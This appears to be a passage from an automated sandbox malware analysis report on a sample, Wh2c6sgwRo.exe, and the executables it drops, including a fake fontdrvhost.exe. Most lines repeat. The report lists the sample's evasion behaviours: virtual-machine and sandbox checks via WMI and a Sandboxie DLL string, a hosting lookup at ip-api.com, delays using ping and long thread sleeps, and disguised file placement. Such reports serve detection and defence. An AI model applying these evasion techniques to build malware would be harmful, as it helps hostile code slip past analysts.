                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Check if machine is in data center or colocation facility
                                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL@
                                Source: Wh2c6sgwRo.exe, 00000000.00000002.1609904365.0000019061D91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                Uses ping.exe to sleep
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeMemory allocated: 190602A0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeMemory allocated: 19079D90000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeMemory allocated: 14F0000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeMemory allocated: 1AF40000 memory reserve | memory write watchJump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMemory allocated: 800000 memory reserve | memory write watch
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMemory allocated: 1A450000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMemory allocated: 1260000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMemory allocated: 1AE70000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exeMemory allocated: 9F0000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exeMemory allocated: 1A450000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exeMemory allocated: 15D0000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exeMemory allocated: 1AF80000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exeMemory allocated: 1030000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exeMemory allocated: 1AB80000 memory reserve | memory write watch
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMemory allocated: 8A0000 memory reserve | memory write watch
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMemory allocated: 1A3B0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMemory allocated: F50000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMemory allocated: 1AB40000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exeMemory allocated: 1460000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exeMemory allocated: 1AF90000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMemory allocated: B30000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMemory allocated: 1A460000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exeMemory allocated: 1460000 memory reserve | memory write watch
                                Source: C:\ProgramData\fontdrvhost.exeMemory allocated: 1AE70000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMemory allocated: AA0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeMemory allocated: 1A4B0000 memory reserve | memory write watch
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 600000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599889
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599780
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599671
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599562
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599453
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599341
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599232
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598884
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598769
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598640
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598505
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598312
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 597218
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 3600000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 596343
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 594093
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 593484
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 593093
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 592859
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 590812
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 590562
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 300000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 590343
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 590130
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 588968
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 588363
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 588156
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 587937
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 587609
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 587452
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 587183
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585670
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585560
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585405
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585276
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585130
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584937
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584828
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584715
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584593
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584484
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584310
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583603
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583462
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583352
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583234
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583124
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583015
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582903
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582767
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582640
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582530
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582421
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582312
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582202
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582093
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 581984
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 581874
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 581750
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 581634
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580867
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580750
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580640
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580531
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580421
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
